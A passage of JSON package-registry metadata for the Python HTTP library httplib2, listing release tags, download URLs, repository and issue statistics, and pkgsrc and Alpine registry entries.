2cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T01:44:48.500Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:pkgsrc/www/py-httplib2?arch=x86_64\u0026os=NetBSD","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/pkgsrc/www/py-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/pkgsrc/www/py-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pkgsrc/www/py-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages/www%2Fpy-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages/www%2Fpy-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages/www%2Fpy-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages/www%2Fpy-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages/www%2Fpy-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages/www%2Fpy-httplib2/codemeta","maintainers":[],"registry":{"name":"pkgsrc-netbsd-x86_64-10.1-all","url":"https://cdn.netbsd.org/pub/pkgsrc/packages/NetBSD/x86_64/10.1/All","ecosystem":"pkgsrc","default":true,"packages_count":19690,"maintainers_count":0,"namespaces_count":43,"keywords_count":368,"github":"pkgsrc","metadata":{"funded_packages_count":480},"icon_url":"https://github.com/pkgsrc.png","created_at":"2026-05-26T08:59:24.518Z","updated_at":"2026-08-25T05:00:19.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/namespaces"}},{"id":6082218,"name":"py2-httplib2","ecosystem":"alpine","description":"Python HTTP client library (for python2)","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2019-01-21T23:15:18.000Z","latest_release_published_at":"2019-01-21T23:15:18.000Z","latest_release_number":"0.12.0-r0","last_synced_at":"2026-03-08T18:15:04.292Z","created_at":"2023-01-31T19:58:34.950Z","updated_at":"2026-08-22T01:44:48.633Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.9/main/x86_64/py2-httplib2","install_command":"apk add py2-httplib2","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib